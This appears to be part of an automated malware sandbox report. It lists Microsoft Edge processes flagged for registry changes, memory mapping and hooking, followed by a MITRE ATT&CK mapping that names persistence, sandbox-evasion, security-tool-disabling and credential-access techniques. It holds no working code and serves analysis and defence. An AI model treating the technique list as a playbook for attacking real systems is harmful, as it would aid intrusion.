"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2416

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5004

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8004

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7468

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6404

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5876

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4644

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7688

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6260

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6780

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery